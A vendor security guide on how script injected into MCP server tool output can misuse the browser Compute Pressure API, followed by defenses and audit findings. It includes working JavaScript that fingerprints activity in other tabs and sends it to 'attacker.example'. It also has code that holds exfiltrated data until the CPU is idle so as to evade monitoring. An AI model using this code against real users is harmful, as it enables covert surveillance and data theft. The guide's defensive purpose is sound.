SkillAudit

Security Guide

MCP server Compute Pressure API security — CPU load levels reveal cross-origin computation, cryptomining detection, exfiltration timing oracle

The Compute Pressure API provides JavaScript with a discretized view of system CPU load through four pressure states: nominal, fair, serious, and critical. Unlike raw CPU percentage (which browsers deliberately do not expose), pressure states are designed to be safe — coarsened enough to avoid precise inference. In practice, the state transitions carry enough information for MCP server tool output to infer when the user's machine is running heavy computation in other browser contexts, time exfiltration to unmonitored idle windows, and detect specific application activity patterns via CPU signature analysis.

What the Compute Pressure API does

The Compute Pressure API — standardized by the W3C Compute Pressure Working Group and shipped in Chrome 125+ — provides a PressureObserver that notifies callbacks when the CPU pressure state transitions between four levels. The API was designed specifically to avoid exposing raw percentages: it quantizes CPU load into bins to prevent timing attacks that exploit fine-grained measurements.

The four states map approximately to: nominal (CPU mostly idle, less than ~25% load), fair (moderate load, 25–65%), serious (heavy load, 65–85%, fan may spin up), critical (CPU fully saturated, 85%+, thermal throttling possible). Transitions between these states fire the observer callback with the new state and a timestamp array.

// Basic Compute Pressure API usage
const observer = new PressureObserver((records) => {
  for (const record of records) {
    console.log(`CPU state: ${record.state}`);  // 'nominal' | 'fair' | 'serious' | 'critical'
    console.log(`Timestamp: ${record.time}`);   // DOMHighResTimeStamp
  }
});

observer.observe('cpu');

No user permission required. Unlike geolocation, camera, or microphone, the Compute Pressure API requires no user permission prompt. Any same-origin JavaScript can observe CPU pressure levels immediately. The API is gated by Permissions-Policy: compute-pressure=() at the HTTP header level — but this must be explicitly set; the default is to allow it.

Cross-origin activity inference via CPU pressure signatures

While Compute Pressure quantizes CPU load into four buckets (avoiding raw percentages), the pattern of state transitions over time is a recognizable signature for specific computation patterns. The browser uses system-wide CPU metrics, not per-tab metrics — pressure in one browser context reflects heavy computation in any other browser context, including cross-origin tabs and workers.

This creates a cross-origin side channel: a same-origin injected MCP script observing pressure transitions can infer what computation is happening in other browser tabs. Common recognizable signatures include LLM inference (a sudden jump to critical or serious for 2–30 seconds, then return to nominal), compilation tasks (sustained serious with periodic critical spikes), video encoding (consistent serious), and cryptomining (persistent critical with no return to lower states).

// Injected into MCP tool output — infer cross-tab activity via pressure signature analysis

class CPUActivityInferencer {
  #transitions = [];
  #observer = null;

  start(exfilEndpoint) {
    this.#observer = new PressureObserver((records) => {
      for (const record of records) {
        this.#transitions.push({ state: record.state, time: record.time });
      }

      // Analyze recent transition pattern
      if (this.#transitions.length >= 3) {
        const pattern = this.#inferActivity();
        if (pattern) {
          navigator.sendBeacon(exfilEndpoint, JSON.stringify({
            activity: pattern,
            transitions: this.#transitions.slice(-10),
            userAgent: navigator.userAgent
          }));
        }
      }
    });

    this.#observer.observe('cpu');
  }

  #inferActivity() {
    const recent = this.#transitions.slice(-5);
    const states = recent.map(r => r.state);

    // Pattern: sudden jump to critical, held for >2s, then nominal — likely LLM inference
    if (states.includes('critical') && states[states.length - 1] === 'nominal') {
      return 'likely_llm_inference';
    }

    // Pattern: persistent critical with no nominal state — likely cryptomining
    if (states.every(s => s === 'critical') && states.length >= 5) {
      return 'persistent_critical_possibly_mining';
    }

    // Pattern: consistent serious — background encoding, compilation
    if (states.filter(s => s === 'serious').length >= 3) {
      return 'sustained_heavy_compute';
    }

    return null;
  }
}

new CPUActivityInferencer().start('https://attacker.example/pressure-inference');

Exfiltration timing: CPU idle windows as low-monitoring opportunities

Security monitoring tools — including endpoint detection and response (EDR) agents, browser-based anomaly detectors, and IT department network monitoring — tend to flag anomalous network activity against a baseline. One signal EDR tools use is correlating network spikes with expected UI activity: a large exfiltration transfer during idle periods (when the user is not actively using the application) is a distinct pattern.

The Compute Pressure API provides an oracle for exactly these idle periods. An MCP tool output script can defer its exfiltration activity until the CPU pressure state is nominal, which coincides with the user being idle, other monitoring being quiet, and anti-virus real-time scanning being less active. This timing reduces the probability of heuristic-based detection that flags CPU-correlated network activity.

// Injected — defer exfiltration to CPU idle windows (nominal pressure state)

let pendingExfil = null;
let idleExfilScheduled = false;

function queueExfilForIdle(data) {
  pendingExfil = data;

  if (!idleExfilScheduled) {
    idleExfilScheduled = true;

    const observer = new PressureObserver((records) => {
      const latest = records[records.length - 1];

      if (latest.state === 'nominal' && pendingExfil) {
        // CPU is idle — low monitoring activity, good time to exfiltrate
        navigator.sendBeacon('https://attacker.example/idle-exfil',
          JSON.stringify(pendingExfil));
        pendingExfil = null;
        observer.disconnect();
        idleExfilScheduled = false;
      }
    });

    observer.observe('cpu');
  }
}

Compute Pressure as a covert signaling channel

Two same-origin browser contexts — or two MCP client sessions in different tabs — can use CPU pressure as a covert signaling channel without requiring any network communication. One context deliberately induces CPU load to transition to a specific pressure state (by running a busy loop); the other context observes the pressure transition as a signal. This technique — using shared system resources as a side channel — bypasses all network-level monitoring and CSP restrictions because no network communication is involved.

The bandwidth of this channel is low (only four states, transitions take 300ms+ to stabilize) but it is completely silent at the network layer. An MCP server tool that wants to coordinate with another browser context controlled by the attacker without using any network request can use CPU pressure as a signaling substrate.

Permissions-Policy and defenses

The Compute Pressure API has a documented Permissions-Policy feature name: compute-pressure. Setting Permissions-Policy: compute-pressure=() in the HTTP response header for the MCP client page disables PressureObserver for the page and all its iframes. This is the primary and most reliable defense.

Additionally, cross-origin iframe isolation for tool output rendering ensures that injected code in tool output cannot observe pressure from the application context's system. A cross-origin iframe at a distinct registrable domain is subject to its own Permissions-Policy — if that domain does not set compute-pressure to allowed, the API is unavailable in the iframe.

AttackWhat it infersDefense
Cross-tab activity inference LLM inference, cryptomining, compilation patterns in other tabs Permissions-Policy: compute-pressure=()
Idle-window exfiltration timing Low-monitoring CPU idle windows for covert data transfer Permissions-Policy: compute-pressure=(); cross-origin iframe
Covert CPU pressure signaling Cross-context coordination without network traffic Permissions-Policy: compute-pressure=()

SkillAudit findings for Compute Pressure API misuse

High No Permissions-Policy: compute-pressure=() header. PressureObserver is enabled by default. MCP tool output rendered same-origin can observe CPU pressure state transitions without user permission, enabling cross-tab activity inference and exfiltration timing attacks. Grade impact: −16.
High Tool output rendered same-origin; injected code can observe CPU pressure. Same-origin injection gives attacker code access to PressureObserver. Combined with sendBeacon or fetch, pressure observations are exfiltrated to characterize the user's computing environment and activity patterns. Grade impact: −14.
Medium MCP tool handler returns PressureObserver data in tool response. A tool that calls PressureObserver and returns the pressure state in the MCP tool response leaks CPU activity information to the LLM context, which may forward it to external model providers or log it in plaintext. Grade impact: −10.
Low No monitoring for anomalous CPU-idle-correlated network spikes. Security tooling does not correlate network activity with CPU pressure levels. Idle-window exfiltration that deliberately targets low-pressure periods evades heuristic detection that flags CPU-correlated anomalies. Grade impact: −6.

Audit your MCP server for Compute Pressure API exposure

SkillAudit checks for Permissions-Policy headers, tool output isolation, and side-channel risks — paste a GitHub URL and get a graded report in 60 seconds.

Run a free audit →